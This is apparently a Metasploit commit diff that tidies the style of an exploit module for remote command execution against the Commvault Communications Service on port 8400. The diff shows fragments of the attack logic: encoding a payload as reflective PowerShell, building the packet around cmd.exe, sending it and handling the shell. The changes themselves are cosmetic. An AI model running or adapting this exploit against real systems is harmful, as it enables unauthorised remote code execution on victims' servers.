Module Cleanup

2017-12-22 10:51:01 -05:00 · 2017-12-22 10:51:01 -05:00 · e088c95a99
parent d657a9dc53
commit e088c95a99
1 changed files with 11 additions and 17 deletions
--- a/modules/exploits/windows/misc/commvault_cmd_exec.rb
+++ b/modules/exploits/windows/misc/commvault_cmd_exec.rb
@ -40,26 +40,22 @@ class MetasploitModule < Msf::Exploit::Remote
            }
          ],
        ],
-      'Privileged'     => false,
+      'Privileged'     => true,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 12 2017'))

-      register_options(
-        [
-          Opt::RPORT(8400),
-        ])
+      register_options([Opt::RPORT(8400)])
+
    end

  def exploit 

-    print_status("Executing payload")
-    buf = build_exploit()   
-
+    buf = build_exploit
+    print_status("Connecting to Commvault Communications Service.")
    connect
-    print_status("Connected to Commvault Communications Service.")
+    print_status("Executing payload")
    #Send the payload
    sock.put(buf)
-    
    #Handle the shell
    handler
    disconnect
@ -67,10 +63,8 @@ class MetasploitModule < Msf::Exploit::Remote
  end


-  def build_exploit()
-    
-    ret_data = ''
-
+  def build_exploit
+ 
    #Get encoded powershell of payload
    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
    #Remove additional cmd.exe call
@ -79,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
    command = command[(idx)..-1]
   
    #Build packet
-    cmd_path = "C:\\Windows\\System32\\cmd.exe"
+    cmd_path = 'C:\Windows\System32\cmd.exe'
    msg_type = 9
    zero = 0
    payload = ""
@ -96,9 +90,9 @@ class MetasploitModule < Msf::Exploit::Remote
    
    #Add length header and payload
    ret_data = [payload.length].pack('I>')
-    ret_data += payload    
+    ret_data += payload

-    return ret_data
+    ret_data

  end
 end